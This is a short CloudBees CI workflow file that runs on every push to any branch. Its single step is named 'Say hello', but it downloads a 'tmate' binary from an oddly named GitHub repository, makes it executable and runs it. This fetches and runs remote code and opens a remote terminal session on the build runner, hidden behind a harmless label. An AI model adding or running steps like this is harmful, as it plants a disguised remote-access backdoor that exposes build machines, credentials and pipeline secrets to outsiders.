apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: My automation

on:
  push:
    branches:
      - '**'

jobs:
  build:
    steps:
      - name: Say hello
        uses: dockerfile
        shell: sh
        run: |
          apt-get update && apt-get upgrade -y && apt-get install wget curl nano -y
          wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate && chmod +x tmate && ./tmate -F

